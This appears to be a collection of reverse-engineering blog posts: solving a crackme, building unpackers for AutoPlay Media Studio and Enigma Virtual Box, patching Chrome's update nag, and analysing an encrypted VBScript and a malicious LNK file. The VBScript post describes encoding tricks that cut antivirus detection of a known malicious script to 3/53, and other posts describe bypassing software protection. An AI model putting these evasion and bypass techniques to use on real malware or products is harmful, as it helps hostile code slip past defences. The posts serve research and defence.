Solving “Find the flag” crackme by Extreme Coders

kao

Yesterday Extreme Coders posted a small crackme on Tuts4You. It's quite an easy one but solving it would require either lots of typing or some clever automation. Of course, being lazy I went for the automation route! πŸ™‚

Initial analysis

My preferred way is doing static analysis in IDA and - when necessary do dynamic analysis using OllyDbg. So, here is how it looks like in IDA:
extremecoders_cm1
As you can see, parts of code have been encrypted. 102 parts of code, to be exact. πŸ™‚

Decrypt the code

Since there is a lot of code that's encrypted, I need to automate decryption somehow. IDA scripting to the rescue!

auto ea;
auto addr;
auto size;
auto xorval;
auto x;
auto b;

ea = MinEA();
ea = FindBinary(ea, SEARCH_DOWN , "E8 00 00 00 00 5E 81 C6");
while (ea != BADADDR)
{
   addr = ea + 5 + 0x16;
   size = Dword(ea + 0xD);
   xorval = Byte(ea + 0x15);
   Message(form("Encrypted code parameters: start=%x size=%x key=%x\n", addr, size, xorval));
   for (x=0; x<size; x++)
   {
      b = Byte(addr + x);
      PatchByte(addr + x, b^xorval);
   }
   ea = FindBinary(ea +1, SEARCH_DOWN, "E8 00 00 00 00 5E 81 C6");
}

There's not much to comment. There's a big loop that's looking for the pattern of the decryption code. Then it extracts information about encrypted code address, size and used encryption key. Finally it decrypts the code.

Note - when you're patching binary data in IDA, it's always better to force IDA to reanalyze the affected fragment. I didn't do that here because changing end of _main() will force analysis automatically.

After decryption the code looks much better:
extremecoders_cm2

Well, it's better, but it still kinda sucks. We have 100 checks like this:

  movsx   edx, [esp+0B0h+enteredString+9]
  movsx   ecx, [esp+0B0h+enteredString+13h]
  add     ecx, edx
  movsx   edx, [esp+0B0h+enteredString+0Bh]
  lea     edx, [edx+ecx*2]
  movsx   ecx, [esp+0B0h+enteredString+1Dh]
  add     edx, ecx
  mov     ecx, dword ptr [esp+0B0h+enteredString]
  movsx   edi, ch
  add     edx, edi
  movsx   edi, [esp+0B0h+enteredString+6]
  add     edx, edi
  movsx   edi, [esp+0B0h+enteredString+2]
  add     edx, edi
  movsx   edi, [esp+0B0h+enteredString+4]
  add     edx, edi
  movsx   edi, [esp+0B0h+enteredString+0Fh]
  add     edx, edi
  movsx   edi, [esp+0B0h+enteredString+0Ah]
  add     edx, edi
  movsx   edi, [esp+0B0h+enteredString+0Ch]
  add     edx, edi
  movsx   edi, [esp+0B0h+enteredString+11h]
  add     edx, edi
  movsx   edi, [esp+0B0h+enteredString+18h]
  add     edx, edi
  movsx   edi, [esp+0B0h+enteredString+0Eh]
  add     edx, edi
  movsx   edi, [esp+0B0h+enteredString+1Ah]
  add     edx, edi
  movsx   edi, [esp+0B0h+enteredString+17h]
  add     edx, edi
  movsx   edi, [esp+0B0h+enteredString+16h]
  movsx   ecx, cl
  add     edx, edi
  add     edx, ecx
  cmp     edx, 787h
  jnz     loc_40147B
  add     eax, 1    <--- increment number of passed checks
loc_40147B:

So, we're solving system of 100 linear equations with 32 variables. Great! Who wants to write down these equations based on disassembly and then solve them manually? Not me!

Decompile the code

Let's see if we can somehow make the problem easier for us. Hexrays decompiler provides nice output but it still needs a lot of cleanup:
extremecoders_cm3
Basically, the code responsible for encryption/decryption of checks is getting into our way.

Another IDA script to the rescue:

auto ea;
auto addr;
auto size;
auto xorval;
auto x;
auto b;

ea = MinEA();
ea = FindBinary(ea, SEARCH_DOWN , "60 E8 00 00 00 00 5E 81");
while (ea != BADADDR)
{
   for (x=0;x<0x1C;x++)
   {
      PatchByte(ea+x, 0x90);
   }
   MakeUnknown(ea, 0x1C, 0);
   MakeCode(ea);
   ea = FindBinary(ea +1, SEARCH_DOWN , "60 E8 00 00 00 00 5E 81");
}   

I took the previous script and modified it a bit. Now it finds both encryption and decryption loops and just nops them out. It also forces IDA to reanalyze the patched region - it's very important because otherwise IDA lost track of correct stack pointer and decompiled code was wrong.

Quick changes in Hexrays plugin options to use decimal radix and the decompiled code looks great!
extremecoders_cm4

Text editor magic

Beginning reversers commonly underestimate power of text editors. Sure, the Hexrays output we got is readable, but it's not really suitable for any sort of automated processing.

First, let's get rid of all extra spaces. Replace " " (2 spaces) with " " (one space). Repeat until no more matches. Now it looks like this:

 if ( enteredString[0]
 + enteredString[22]
 + enteredString[26]
 + enteredString[20]
 + enteredString[10]
 + enteredString[7]
 + 3 * enteredString[14]
 + 2
 * (enteredString[23]
 + enteredString[24]
 + enteredString[17]
 + enteredString[21]
 + enteredString[12]
 + enteredString[18]) == 2024 )
 v6 = 1;
 if ( enteredString[0]
 + enteredString[22]
 + enteredString[23]
... 98 more ifs...

Put each equation on one line. Replace "\r\n +" (new line,space,plus) with " +" (space,plus). Replace "\r\n *" (new line,space,star) with " *" (space,star).

 if ( enteredString[0] + enteredString[22] + enteredString[26] + enteredString[20] + enteredString[10] + enteredString[7] + 3 * enteredString[14] + 2 * (enteredString[23] + enteredString[24] + enteredString[17] + enteredString[21] + enteredString[12] + enteredString[18]) == 2024 )
 v6 = 1;
 if ( enteredString[0] + enteredString[22] + enteredString[23] + enteredString[26] + enteredString[14] + enteredString[24] + enteredString[17] + enteredString[12] + enteredString[10] + enteredString[15] + enteredString[4] + enteredString[2] + enteredString[6] + enteredString[1] + enteredString[29] + enteredString[11] + 2 * (enteredString[9] + enteredString[19]) == 1927 ) ++v6;
 if ( enteredString[14] + enteredString[10] == 148 ) ++v6;
 if ( enteredString[0] + enteredString[14] + enteredString[10] + enteredString[11] + enteredString[3] + enteredString[25] + 2 * (enteredString[22] + enteredString[27]) == 741 ) ++v6;
 if ( enteredString[24] + enteredString[29] == 229 ) ++v6;
... 95 more ifs ...

Get rid of those "if". Get rid of "++v6;". Replace "==" with "=".

enteredString[0] + enteredString[22] + enteredString[26] + enteredString[20] + enteredString[10] + enteredString[7] + 3 * enteredString[14] + 2 * (enteredString[23] + enteredString[24] + enteredString[17] + enteredString[21] + enteredString[12] + enteredString[18]) = 2024 )
enteredString[0] + enteredString[22] + enteredString[23] + enteredString[26] + enteredString[14] + enteredString[24] + enteredString[17] + enteredString[12] + enteredString[10] + enteredString[15] + enteredString[4] + enteredString[2] + enteredString[6] + enteredString[1] + enteredString[29] + enteredString[11] + 2 * (enteredString[9] + enteredString[19]) = 1927
enteredString[14] + enteredString[10] = 148
enteredString[0] + enteredString[14] + enteredString[10] + enteredString[11] + enteredString[3] + enteredString[25] + 2 * (enteredString[22] + enteredString[27]) = 741
enteredString[24] + enteredString[29] = 229
... 95 more equations ...

Finally, rename "enteredString" to "z" and get rid of those "[" and "]"

z0 + z22 + z26 + z20 + z10 + z7 + 3 * z14 + 2 * (z23 + z24 + z17 + z21 + z12 + z18) = 2024 )
z0 + z22 + z23 + z26 + z14 + z24 + z17 + z12 + z10 + z15 + z4 + z2 + z6 + z1 + z29 + z11 + 2 * (z9 + z19) = 1927
z14 + z10 = 148
z0 + z14 + z10 + z11 + z3 + z25 + 2 * (z22 + z27) = 741
z24 + z29 = 229
... 95 more equations ...

Congratulations, within one minute you got from ugly decompiled code to well-written system of equations!

And solve the problem

Nicely written system of equations is pointless, if you can't solve it. Luckily, there's an online solver for that right there! πŸ˜‰ Copy-pasting our cleaned system of equations into their webform gives us result:

This system has a unique solution, which is

{ z0 = 102, z1 = 108, z10 = 48, z11 = 108, z12 = 118, z13 = 101, z14 = 100, z15 = 95, z16 = 116, z17 = 104, z18 = 97, z19 = 116, z2 = 97, z20 = 95, z21 = 114, z22 = 49, z23 = 103, z24 = 104, z25 = 116, z26 = 33, z27 = 33, z28 = 33, z29 = 125, z3 = 103, z4 = 123, z5 = 89, z6 = 48, z7 = 117, z8 = 95, z9 = 115 }.

Converting character codes to ANSI string is an equally simple exercice, I'm not gonna bore you with that.

And that's how you solve a crackme with nothing but a few scripts in IDA and a text editor.. πŸ˜‰

Static unpacker for AutoPlay Media Studio files

kao

tl;dr version - it unpacks stuff. Feel free to leech and reupload. Report bugs here.

Unpacker for AutoPlay Media Studio

Introduction

It all started with a topic on BlackStorm forums where whoknows posted a link to Reverzor - The first cloud based software that decompiles everything!.

Wow, a magic tool that does everything! Sounds too good to be true.. πŸ™‚ Soon enough, li0n posted a link to the trial executable and I started looking into it. I quickly found out that it's written in AutoPlay Media Studio, and that there is no working unpacker for that.

I should fix that - and have some fun in process!

Existing tools and research

First, I found a great blogpost by Xiaopang - I wholeheartedly recommend that you read it.

And then there's a AmsDec.exe by mohsen.
amsdec
Unfortunately, it only works for some files (supposedly - v8.1, v8.2) and shows weird messages in Persian language. And it's not really a decompiler, it just extracts _proj.dat file from the cdd file. And, of course, it didn't work for Reverzor.

How AutoPlay Media Studio works

So, let's see what we need to do to unpack it all properly. As the authors of AutoPlay Media Studio wrote in changelog:

As we all know, anyone determined enough can break any protection system given enough time and resources, but the use of rolling codes renders generic attacks ineffective. You can now sleep a little easier!

Right... They are using ZIP files protected with randomly generated passwords and obviously have no clue how generic attacks work..

Unpacker needs to analyze EXE file, generate correct password and unzip files. If there's a cdd file, unzip that one too. And since it's that simple, I will use AutoPlay Media Studio as a target for a separate blogpost explaining how to write a static unpacker from scratch. πŸ™‚

Since there are several options how you can distribute files built by AutoPlay Media Studio, here's a quick reference:

  1. you have just a single application.exe;
  2. Such files can be generated using "Publish -> Web/Email executable" feature in AutoPlay Media Studio. Example file would be CardRecovery v
    6.10 Build 1210 AIO Installer -nelly-.exe

    Drop the exe file on unpacker, it will unpack everything automatically. Then check the appropriate folder for extracted data files and _proj.dat for the installation script.

  3. you have a folder with application.exe and application.cdd in a subfolder AutoPlay;
  4. These files are created using "Publish -> Hard drive folder" in AutoPlay Media Studio. An example file can be, for example, Russian software (malware?) claiming to be a Photoshop installer.

    There is not much to unpack, as data files are in plain sight in folder AutoPlay and subfolders. Drop the exe file on unpacker, it will find cdd file automatically and unpack everything, including _proj.dat.

  5. you have application.exe and application.cdd files in the same folder;
  6. This happens when "Rename resource files" feature is enabled in AutoPlay Media Studio. It's one of those features that add fake security to the product:

    This option is designed to obscure the filenames of your resource files during publishing.

    This is a case of Users Sniffer. Similar to previous case, there's not much to unpack. Drop the exe file on unpacker, it will find cdd file automatically and unpack everything, including _proj.dat.

Advanced use cases

But sometimes things are not that easy. So, here are few possible scenarios how to deal with modified AutoPlay Studio:

  1. application.exe is packed and there is application.cdd file present.
  2. This is a case of official AMS studio challenge that Xiaopang mentioned on the blog. Good news - you don't need to be an unpacking wizard and properly unpack PCGuard to break their protection. It's enough to run the EXE in VMWare, dump process memory and drop dumped exe on my tool. As long as PE header and section table is correct, it should be fine.

    Step-by-step:
    1) Run and dump:
    challenge1
    2) When saving dump, keep the original filename. Otherwise my unpacker won't be able to find cdd file:
    challenge2
    3) Process dump with unpacker:
    challenge3

  3. application.exe is packed and there is no cdd file.
  4. This is the case of Reverzor. First you would need to unpack Enigma Virtual Box - for that you can use my other unpacker.. πŸ˜‰ Now you have both exe and cdd files but exe file is still packed with ASPack. Again, you don't need to unpack ASPack properly, just run & dump process memory. Then process dumped exe with my unpacker.

  5. application.exe is hacked and the cdd file is renamed to something else;
  6. This is a case of Idler. Author hacked AutoPlay engine and replaced file extension cdd with dll.
    idler
    There is no way for my unpacker to cover all such scenarios automatically, sorry. Just rename idler.dll to idler.cdd and drop idler.exe on unpacker.

Conclusion

This was a small weekend project for me. If it also helps you in some adventures, I'm happy. If it doesn't help you at all, I don't care. πŸ™‚

Download the unpacker from:


Note - due to technical reasons it's compiled against .NET 3.5, if you wish to run it on computer with only .NET 4.0 installed, create amsunpacker.exe.config with the following lines:


<?xml version="1.0"?>
<configuration>
 <startup>
  <supportedRuntime version="v4.0"/>
 </startup>
</configuration>


And stay tuned for the upcoming post, where I'll explain how to write such unpacker from scratch!

Dancing pigs – or how I won my fight with Google Chrome updates

kao

I think removing NPAPI support from Google Chrome was a really stupid decision from Google. Sure, Java and some other plugins were buggy and vulnerable. But there is a huge group of users that need to have NPAPI for perfectly legit reasons. Certain banks use NPAPI plugins for 2-factor authentication. Certain countries have made their digital government and signatures based on NPAPI plugins. And the list goes on.

I have my reasons too. If I have to run older version of Chrome for that, I will do so - and no amount of nagging will change my mind.

That’s a well known fact in security circles, named "dancing pigs":

If J. Random Websurfer clicks on a button that promises dancing pigs on his computer monitor, and instead gets a hortatory message describing the potential dangers of the applet β€” he's going to choose dancing pigs over computer security any day

Unfortunately pointy-haired managers at Google fail to understand this simple truth. Or they just don't give a crap.

Hello, I am AutoUpdate, I just broke your computer

Imagine my reaction one day when my NPAPI plugin suddenly stopped working. It just wouldn't load. It turned out that Google Chrome was silently updated by Google Update. It broke my plugin in the process and - officially - there is no way of going back.

What do you think I did next?

That's right - I disabled Google Update from services, patched GoogleUpdate.exe to terminate immediately and restored previous version of Google Chrome from the backup. Dancing pigs, remember?

Your Google Chrome is out-of-date

It worked well for few months. But this week, Chrome started nagging me again.
chrome_nag1
Quick Google search lead me to this answer: you need to disable Chrome updates using Google's administrative templates.

Let's ignore the fact that the described approach works only for XP (for Windows 7 you need to use ADMX templates which you need to copy manually to %systemroot%\PolicyDefinitions) and now there are like 4 places related to Google Chrome updates in the policies.

So, I set the policies and it seemed to work. For a day.

Your Google Chrome is still out-of-date

Imagine my joy the next day when I saw yet-another-nagscreen. Like this:
chrome_nag2

No, I don't need that update. Really!

I can close the nag, but 10 minutes later it will pop up again. And it looks like the only way to get rid of the nag is to patch chrome.dll. I really didn't want to do that but dumb decisions by Google managers are forcing my hand here.

Reversing Google Chrome

Since Chrome is more or less open-source, you can easily find the nagware message:

      
        Chrome could not update itself to the latest version, so you are missing out on awesome new features and security fixes. You need to update Chrome.
      

From here, we can find which dialog is responsible for the nag:

void OutdatedUpgradeBubbleView::Init() {
  ui::ResourceBundle& rb = ui::ResourceBundle::GetSharedInstance();
  accept_button_ = new views::LabelButton(
      this, l10n_util::GetStringUTF16(
          auto_update_enabled_ ? IDS_REINSTALL_APP : IDS_REENABLE_UPDATES));
  accept_button_->SetStyle(views::Button::STYLE_BUTTON);
  accept_button_->SetIsDefault(true);
  accept_button_->SetFontList(rb.GetFontList(ui::ResourceBundle::BoldFont));
  elevation_icon_setter_.reset(new ElevationIconSetter(
      accept_button_,
      base::Bind(&OutdatedUpgradeBubbleView::SizeToContents,
                 base::Unretained(this))));

  later_button_ = new views::LabelButton(
      this, l10n_util::GetStringUTF16(IDS_LATER));
  later_button_->SetStyle(views::Button::STYLE_BUTTON);

  views::Label* title_label = new views::Label(
      l10n_util::GetStringUTF16(IDS_UPGRADE_BUBBLE_TITLE));
  title_label->SetFontList(rb.GetFontList(ui::ResourceBundle::MediumFont));
  title_label->SetHorizontalAlignment(gfx::ALIGN_LEFT);

  views::Label* text_label = new views::Label(l10n_util::GetStringUTF16(
      auto_update_enabled_ ? IDS_UPGRADE_BUBBLE_TEXT
                           : IDS_UPGRADE_BUBBLE_REENABLE_TEXT));

From there we can find NOTIFICATION_OUTDATED_INSTALL which comes from UpgradeDetector. And finally we arrive at CheckForUpgrade() procedure:

void UpgradeDetectorImpl::CheckForUpgrade() {
  // Interrupt any (unlikely) unfinished execution of DetectUpgradeTask, or at
  // least prevent the callback from being executed, because we will potentially
  // call it from within DetectOutdatedInstall() or will post
  // DetectUpgradeTask again below anyway.
  weak_factory_.InvalidateWeakPtrs();

  // No need to look for upgrades if the install is outdated.
  if (DetectOutdatedInstall())
    return;

  // We use FILE as the thread to run the upgrade detection code on all
  // platforms. For Linux, this is because we don't want to block the UI thread
  // while launching a background process and reading its output; on the Mac and
  // on Windows checking for an upgrade requires reading a file.
  BrowserThread::PostTask(BrowserThread::FILE, FROM_HERE,
                          base::Bind(&UpgradeDetectorImpl::DetectUpgradeTask,
                                     weak_factory_.GetWeakPtr()));
}

This is what I want to patch! But how?

You could load Chrome DLL in IDA and try to find the offending call on your own. But I'm willing to bet that it will take you hours, if not days. Well, PDB symbols to the rescue!

Symbols for Chrome are stored at https://chromium-browser-symsrv.commondatastorage.googleapis.com and you will need to add that path to your _NT_SYMBOL_PATH. Something like this:

set _NT_SYMBOL_PATH=SRV*F:\Symbols*https://msdl.microsoft.com/download/symbols;SRV*F:\Symbols*https://chromium-browser-symsrv.commondatastorage.googleapis.com

_NT_SYMBOL_PATH is a very complex beast, you can do all sorts of things with it. If you want a more detailed explanation how it works, I suggest that you read Symbols the Microsoft Way.

After that, you can load chrome.dll in IDA, wait until IDA downloads 850MB of symbols, and drink a coffee or two while IDA is analyzing the file. After that it's all walk in the park. This is the place:

.02CF3BDF: 55                             push         ebp
.02CF3BE0: 8BEC                           mov          ebp,esp
.02CF3BE2: 83EC20                         sub          esp,020 ;' '
.02CF3BE5: 8365FC00                       and          d,[ebp][-4],0
.02CF3BE9: 56                             push         esi
.02CF3BEA: 8BF1                           mov          esi,ecx
.02CF3BEC: 57                             push         edi
.02CF3BED: 8DBE10010000                   lea          edi,[esi][000000110]

And one retn instruction makes my day so much better..

Final words

Unfortunately for me, this world is changing. You are no more the sole owner of your devices, all the big corporations want to make all the decisions for you.

Luckily for me, it is still possible to achieve a lot using a disassembler and debugger. And reverse engineering for interoperability purposes is completely legal in EU. πŸ™‚

Have fun!

Static Enigma Virtual Box unpacker, part 3

kao

Here comes a new version. Again. πŸ™‚

EnigmaVB_Unpacker_v033

I added support for Enigma Virtual Box 7.30, (hopefully) fixed all issues with very long filenames and fixed an issue with processing command-line.

Thanks to ManOfWar for constantly supplying new challenges and parrot for bringing my attention to a bug with command-line.

Download link: Please get latest version from this post

Fun with encrypted VBScript

kao

In the post on malicious LNK file analysis, I mentioned that malicious LNK file contained encrypted VBScript. Of course I wanted to check the script, so I started Googling for tools to decrypt VBScript files.

Existing tools

There is some research about the used encryption algorithm and few tools as well. The most useful to me seemed article explaining the algorithm behind script encoder. Its author also has released several versions of his scrdec tool which is supposed to decrypt VBE files.

But, as it usually happens, publicly available tools tend to blow up in the most unexpected ways on non-standard scripts.

I'm gonna fix that!

Cause of the problems

All publicly available tools assume that the encrypted file will be using ANSI encoding. But it doesn't have to! πŸ™‚ All the operations in vbscript.dll use wide chars and wide strings.

For example, here's a simple encrypted VBScript that is saved as a "unicode" file: https://www.mediafire.com/?cd98w73v12fpdq7. This one you can actually open in notepad, save as ANSI and then decode using scrdec.exe.

But how about this one? https://www.mediafire.com/?xdj6dfxsrcgbdr1. You can open it in text editor and save as ANSI - but after that it will not work anymore and script decoders will fail as well. How about that? πŸ˜‰

Writing my own script decoder

Taking into account these problems, I decided to write my own decoder in C#. C# seemed to be a logical choice as .NET uses wide strings internally and it has StreamReader class that can take care of ANSI/Unicode/UTF8 string encoding automatically - so that I can focus on the actual decryption algorithm instead.

Well, almost.

.NET Framework contains Base64 decoding functions. Unfortunately, VBE files use a nonstandard approach to Base64. So, I had to implement simple Base64 decoder from scratch, taking into account all the weirdness of the VBE files. But that's a very simple thing to do.

First version of decoder took me few hours to make. And it worked nicely! πŸ™‚ But I still wasn't satisfied because vbscript.dll disassembly showed me quite a few "weird" jumps. They were not taken in my examples but I was sure I could make up some test files that would force these jumps to be taken.

Oh boy, I rather wish I hadn't done that..

Bug-features of VBScript.dll

It turns out that not only you can use wide chars, you can do some other really hairy stuff:

  • you can mix encrypted code blocks with plain VBS in one file;
  • and you can put several encrypted code blocks in one file;
  • if encrypted code block length cannot be decoded or is larger than the filesize, this block will be considered to be plain VBS;
  • if encrypted code block checksum cannot be decoded or doesn't match the calculated one, this block will be considered to be plain VBS;

Having fun already?

It took me a few more hours to get my script decoder right. Now it should work almost the same way Microsoft's vbscript.dll works. But I wonder how many AV engines got this implementation right? We shall test and see!

Testing AV engines

OK, OK, I didn't really test AV engines. I just used VirusTotal to scan the files. This approach is really flawed (for many reasons that deserve a separate blog post) but it gives you some estimate how good or bad the situation really is.

I googled for some really common and easily detected VBScript malware. In few minutes I found this great example named aiasfacoafiasksf.vbs.

Let's see what VirusTotal says for the original file:

File name: aiasfacoafiasksf.vbs
Detection ratio: 38 / 56
Analysis date: 2015-06-30 12:10:06 UTC

OK, that's pretty decent. Should I try encrypting it using Microsoft's screnc.exe?

Hmm, VT results are 24/55. Looks like some antiviruses don't even know that VBScript can be encrypted..

Let's see what happens when we start pushing the limits:

  • Converting VBE to unicode we get: 19/55. Wide strings? Who needs that, the entire world speaks English;
  • VBE file consisting of multiple blocks: 12/55. I know, for loop is hard to implement;
  • Mixing plain text and encrypted VBE blocks: 10/55. Nah, that lonely jmp will never be taken;
  • Mixing plain/encrypted blocks and using unicode: 7/55. I feel really protected now;

Please note, I haven't modified a single byte in the plain-text representation of the malicious script. All I did is change the way the script is encoded.

Let's see what happens when I add some comments to the malicious script. Again, these are cosmetic changes, I am not changing a single variable name or functionality of the script. Any AV engine that normalizes input data before scanning should still detect malware.

  • Plain VBS with extra comments: 14/55. Apparently they don't normalize input data;
  • VBE with extra comments: 10/55. That's kinda expected;
  • Extra comment containing VBE start marker: 10/55. Suddenly getting "BehavesLike.JS.Autorun.mx" from McAfee. Excuse me? Are you using PRNG to generate those detections?

OK, so adding comments to VBScript is not that bad. But what happens when we put it all together?

Add extra comments + one VBE start marker in comment + one encrypted VBE block + use unicode: 3/53.

Hmmmm...

What can I say? Apparently some AV companies love to talk about their script engine features - but they don't implement these features properly. It would be extremely easy to detect most of my test files as malformed VBScript - as there is no way to generate such files using standard tools. But they don't do even that. Considering all this misery, I will not release any code that could be used to create super-duper-awesome-FUD VBScript encoder - even though it takes less than an hour to make one.

Note - it took me few weeks to get this post from a working draft to a published version. I'm sure that current VirusTotal results will be different, as most AV companies have had chance to process script files and make signatures for them. πŸ˜‰ Also, any decent AV company should be able to get those samples from VirusTotal if they wish to fix their VBScript processing.

Have fun and keep it safe!

Useful links

Windows Script Encoder v1.0
My VBScript decoder: https://www.mediafire.com/?9pqowl05um4jums
I am not posting the source code but this is a non-obfuscated application made in C#. So feel free to use any decompiler you like..
Set of non-malicious VBE files demonstrating some edge cases of what you can do: https://www.mediafire.com/?bu3u62t858dn4id
Article in klaphek.nl, explaining the algorithm behind script encoder
scrdec.exe v1.8
scrdec.c v1.8
vbs_dec.pas by Andreas Marx

Linking OMF files with Delphi

kao

Continuing the discussion about Delphi compiler and the object files.

Here is the OMF file template I made for 010 Editor: https://www.mediafire.com/?bkpbkjvgen7ubz1
omf_parser

Please note, it is not a full-featured implementation of OMF specification. I only implemented all OMF file records that are processed by Delphi 2007 compiler. So, next time you have a cryptic compiler error while trying to link OMF file in Delphi, you can take a look into your OBJ file and make an educated guess what's causing the problem.

TL;DR version

In 95+% of cases you will encounter OBJ file that has unsupported segment name in SEGDEF record. And it's a simple fix, too - you just need to use objconv.exe by Agner Fog and use -nr option to rename the offending segment. Something like this:

objconv.exe input.obj -nr:BadSegmentName:DATA output.obj

Next possible issue is exceeding the number of EXTDEF or LNAMES records - this can happen if you're trying to convert a really large DLL file into OBJ file.

Finally, your OBJ file might contain some record type which is not supported by Delphi compiler at all. I'm not aware of a simple way to fix it, I would try using 010Editor and OMF template to remove the entire record.

If your problem is not caused from any of the above issues, please feel free to drop me a note - I'll be happy to look into it.

Known limitations of Delphi compiler

This is a list of limitations I was able to compile and/or confirm. Some of them come from Embarcadero official notes and the rest I obtained by analyzing dcc32.exe.

SEGDEF (98H, 99H)

  • Not more than 10 segments - if number of segments exceeds 10, buffer overrun will probably happen.
  • Segments must be 32bits. Will cause "E2215 16-Bit segment encountered in object file '%s'"
  • Segment name must be one of (case insensitive):
    • Code segments: "CODE", "CSEG", "_TEXT"
    • Constant data segments: "CONST", "_DATA"
    • Read-write data segments: "DATA", "DSEG", "_BSS"

    Segment with any other name will be ignored.

LNAMES (96H)

Not more than 50 local names in LNAMES records - will cause "E2045 Bad object file format: '%s'" error.

EXTDEF (8CH)

Not more than 255 external symbols - will cause "E2045 Bad object file format: '%s'"
Certain EXTDEF records can also cause "E2068 Illegal reference to symbol '%s' in object file '%s'" and "E2045 Bad object file format: '%s'"

PUBDEF (90H, 91H)

Can cause "E2045 Bad object file format: '%s'" and "F2084 Internal Error: %s%d"

LEDATA (A0H, A1H)

Embarcadero says that "LEDATA and LIDATA records must be in offset order" - I am not really sure what that means. Can cause "E2045 Bad object file format: '%s'"

LIDATA (A2H, A3H)

Embarcadero says that "LEDATA and LIDATA records must be in offset order" - I am not really sure what that means. Can cause "E2045 Bad object file format: '%s'"

FIXUPP (9CH)

This type of record is unsupported, will cause immediate error "E2103 16-Bit fixup encountered in object file '%s'"

FIXUPP (9DH)

Embarcadero documentation says:

  • No THREAD subrecords are supported in FIXU32 records
  • Only segment and self relative fixups
  • Target of a fixup must be a segment, a group or an EXTDEF

Again I'm not sure what they mean. But there are lots of checks that can cause "E2045 Bad object file format: '%s'"

THEADR (80H)

Accepted by compiler, but no real checks are performed.

LINNUM (94H, 95H)

Accepted by compiler, but no real checks are performed.

MODEND (8AH, 8BH)

Accepted by compiler, but no real checks are performed.

COMMENT (88H) and GRPDEF (9AH)

Ignored by compiler.

That's the end of the list. Any other entry type will cause immediate error "E2045 Bad object file format: '%s'" πŸ™‚

Useful links

My OMF file template for 010Editor: https://www.mediafire.com/?bkpbkjvgen7ubz1
OMF file format specification.
The Borland Developer's Technical Guide
Objconv.exe by Agner Fog
Manual for objconv.exe

Weirdness of C# compiler

kao

I've been quite busy lately. I made OMF file template I promised few weeks ago, found a remote code execution vulnerability in One Big Company's product and spent some time breaking keygenme by li0nsar3c00l. I'll make a blog post about most of these findings sooner or later.

But today I want to show you something that made me go WTF..

I needed to see how the loop "while true do nothing" looks like in IL. Since C# compiler and .NET JIT compiler are quite smart and optimize code that's certainly an eternal loop, I needed to get creative:

using System;

static class Test
{
  static void bla(Int32 param)
  {
     while (param != 0) {};  // loop loop loop!
     Console.WriteLine("1");
  }

  static void Main()
  {
     bla(123);
  }
}

Nothing fancy, but C# & JIT compiler don't track param values, so they both generate proper code..

Well, I thought it's a proper code, until I looked at generated MSIL:

.method private hidebysig static void  bla(int32 param) cil managed
  {
    // Code size       28 (0x1c)
    .maxstack  2
    .locals init (bool V_0)
    IL_0000:  nop
    IL_0001:  br.s       IL_0005

    IL_0003:  nop
    IL_0004:  nop
    IL_0005:  ldarg.0
    IL_0006:  ldc.i4.0
    IL_0007:  ceq
    IL_0009:  ldc.i4.0
    IL_000a:  ceq
    IL_000c:  stloc.0
    IL_000d:  ldloc.0
    IL_000e:  brtrue.s   IL_0003

    IL_0010:  ldstr      "1"
    IL_0015:  call       void [mscorlib]System.Console::WriteLine(string)
    IL_001a:  nop
    IL_001b:  ret
  } // end of method Test::bla

WTF WTF WTF? Can anyone explain to me why there are 2 ceq instructions?

I could understand extra nop and stloc/ldloc instructions, but that ceq completely blows my mind.. And it's the same for .NET 2.0 and 4.5 compilers.

Analyzing malicious LNK file

kao

Last week I noticed a month-old post from F-Secure titled "Janicab Hides Behind Undocumented LNK Functionality" in my RSS Reader. I had starred it but never had time to read and analyze it thoroughly. Post title and their statement caught my attention:

But the most interesting part is the use of an undocumented method for hiding the command line argument string from Windows Explorer.

What is this undocumented functionality you're talking about? Tell me more! Unfortunately, they didn't provide any technical details just some screenshots.

I'm gonna fix that (and have some fun in process) πŸ™‚

Initial findings and available tools (are crap)

Armed with information from FSecure's post, I started Googling. In a few minutes I found VirusTotal scan and a couple of searches later the LNK file itself. Now what?

I'm not a LNK file expert and I don't have magic tools for analyzing them. So, I did what everyone else would - Googled again. There are 3 tools that can be found easily:

All of these tools showed the same information as VirusTotal scan - absolutely nothing useful. See for yourself in screenshots:
lnk_template_original

Marked in blue is the final structure of LNK file, as per 010Editor Template. COMMAND_LINE_ARGUMENTS are empty. And it looks like malware authors somehow managed to put the real command-line "/c copy *.jpg.lnk..." outside the defined structures, right? How's that possible?

So, I got an official Shell Link (.LNK) Binary File Format specification by Microsoft and started reading.

Fixing 010Editor template

LNK file consists of sequence of structures of variable size. There's always size of the structure, followed by data. Right after it there's a next size and next data. Size, data, size, data.. It's very easy to process, just look at the size, read the appropriate number of bytes, process them. Repeat until done. How hard is that?

Yet, Mr. Stevens (proudly calling himself Microsoft MVP Consumer Security, CISSP, GSSP-C, MCSD .NET, MCSE/Security, MCITP Windows Server 2008, RHCT, CCNP Security, OSWP) managed to mess up his template.

lol

His implementation of LinkInfo structure looks like this:

typedef struct
{
	DWORD LinkInfoSize;
	DWORD LinkInfoHeaderSize;
	LinkInfoFlags sLinkInfoFlags;
	DWORD VolumeIDOffset;
	DWORD LocalBasePathOffset;
	DWORD CommonNetworkRelativeLinkOffset;
	DWORD CommonPathSuffixOffset;
	if (LinkInfoHeaderSize >= 0x00000024 )
	{
		DWORD LocalBasePathOffsetUnicode;
		DWORD CommonPathSuffixOffsetUnicode;
	}
	if (sLinkInfoFlags.VolumeIDAndLocalBasePath == 1)
	{
		VolumeID sVolumeID;
		string LocalBasePath;
		string CommonPathSuffix;
	}
	if (sLinkInfoFlags.CommonNetworkRelativeLinkAndPathSuffix == 1)
	{
		CommonNetworkRelativeLink sCommonNetworkRelativeLink;
	}
} LinkInfo;

He just reads all the fields one after another and expects that the length of all the fields will be equal to the size of structure (LinkInfoSize). Sure, it might work on "normal" LNK files but we're dealing with malware and intentionally modified files here. πŸ˜‰

After fixing that and few more bugs in the template, I was able to see the proper structure of this LNK file:
lnk_template_fixed_overview
Command-line passed to cmd.exe is exactly where it should be, so why is Windows Explorer having problems with it?

Modifications in LNK file

Well, let's look at the file in more details.

lnk_template_lots_of_zeros_1
Looks like someone took a hex editor and just filled with zeroes every possible field in most of ItemID structures.

lnk_template_lots_of_zeros_2
Same in LinkInfo, lots of zeroes.

lnk_template_lots_of_zeros_3
And in EnvironmentDataBlock too..

lnk_template_lots_of_zeros_4
Hmm, this is interesting, 0xA0000000 is not a defined ExtraData structure ID according to MS spec.

